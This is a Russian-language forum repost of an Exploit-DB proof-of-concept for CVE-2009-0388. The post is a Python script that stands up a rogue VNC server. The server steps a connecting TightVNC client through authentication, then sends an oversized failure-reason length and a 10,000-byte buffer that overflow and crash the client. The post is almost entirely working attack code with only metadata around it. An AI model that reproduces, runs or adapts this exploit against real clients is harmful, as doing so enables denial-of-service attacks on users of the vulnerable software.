Exploit TightVNC - Authentication Failure Integer Overflow (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8024
Проверка EDB
  1. Пройдено
Автор
DESI
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2009-0388
Дата публикации
2009-02-09
Код:
#!/usr/bin/env python

#[email protected]

# Modified  Andres Lopez Luksenberg's exploit for Authentication Failure scenario in TightVNC. BID 33569 CVE-2009-0388

import socket

serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)

while True:
		clientsocket, clientaddres = serversocket.accept()
		
		data = 'RFB 003.008\n'
		clientsocket.sendall(data)

		data_cli = clientsocket.recv(1024)
		print data_cli

		data = '\x02\x02\x10'
		clientsocket.sendall(data)

		data_cli = clientsocket.recv(1024)

		data = '\x00'*4
		clientsocket.sendall(data)

		data = ('\x00'*3)+'\x01'
		clientsocket.sendall(data)

		data = ('\x00'*3)+'\x02STDVVNCAUTH_'
		clientsocket.sendall(data)

		data_cli = clientsocket.recv(1024)

		data = ('\x01'*16)
		clientsocket.sendall(data)

		data_cli = clientsocket.recv(1024)
		
		data = '\x00\x00\x00\x01'
		clientsocket.sendall(data)

		data = '\xf0\xff\xff\xff'
		clientsocket.sendall(data)

		data = 'A'*10000
		clientsocket.sendall(data)

clientsocket.close()
serversocket.close()

# milw0rm.com [2009-02-09]
 
Источник
www.exploit-db.com

Похожие темы